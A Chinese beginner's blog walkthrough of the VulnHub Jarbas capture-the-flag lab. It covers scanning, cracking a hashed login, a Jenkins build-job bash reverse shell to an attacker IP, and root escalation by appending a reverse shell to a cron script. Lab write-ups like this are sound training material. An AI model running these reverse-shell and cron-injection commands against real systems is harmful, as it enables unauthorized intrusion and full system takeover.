小白渗透之旅——Jarbas靶场(急速版)

前言

        这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。

        ps:这是小编以前大二的期末渗透考题,所以比较简洁( ‘-ωก̀ )

一、环境配置及靶场下载


        靶场下载地址:https://download.vulnhub.com/jarbas/Jarbas.zip

1.下载靶场文件,然后打开

        靶机和攻击机设置为同一网段就好,小编设置的是kali还有靶机都是NAT模式

二、信息收集

1、探测主机存活

        靶场扫描nmap -sV 192.16.22.0/24

2、目录扫描 

        扫描网站目录 dirb http://192.168.22.145/ -X .html

3、进入access.html 

        进入网站,对加密密码进行ND5解密,获得网站后台账号密码eder/vipsu

三、漏洞利用

1、进入后台

        进入网站后台 192.168.22.139:8080

2、构建任务 进行 shell 反弹

        创建反弹shell:bash -i &> /dev/tcp/192.168.22.139/1111 0>&1

        跟着下面图片的步骤:

         注意ip还有端口写上kali的ip和端口

四、kali上线 

1.kali起监听 

        在kali监听1111端口,因为刚刚我们写的shell反弹到kali的1111端口

        nc -lvnp 1111                                                                                  //监听1111端口

2.启动脚本

五、crontab计划任务提权

1、上线成功,查看定时任务

        查看计划任务发现flag1还有flag3

        cat  /etc/crontab                                                             //查看计划任务·

        查看存在一个以root权限执行的脚本,每五分钟执行一次,尝试写入反弹shell

2、计划任务提权

        在/etc/script/CleaningScript.sh计划任务中写入反弹shell

        shell  echo "/bin/bash -i &> /dev/tcp/192.168.22.139/2222 0>&1" >> /etc/script/CleaningScript.sh

3、然后在开一个终端,起监听

六、上线成功,查找flag

        1、因为这个脚本每五分钟运行一次,所以需要等五分钟

         2、上线成功,可以看到是root权限

        查找flag  find / -name “*flag*”                                  //在系统中查找带有flag的文件

        搞定!!! 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值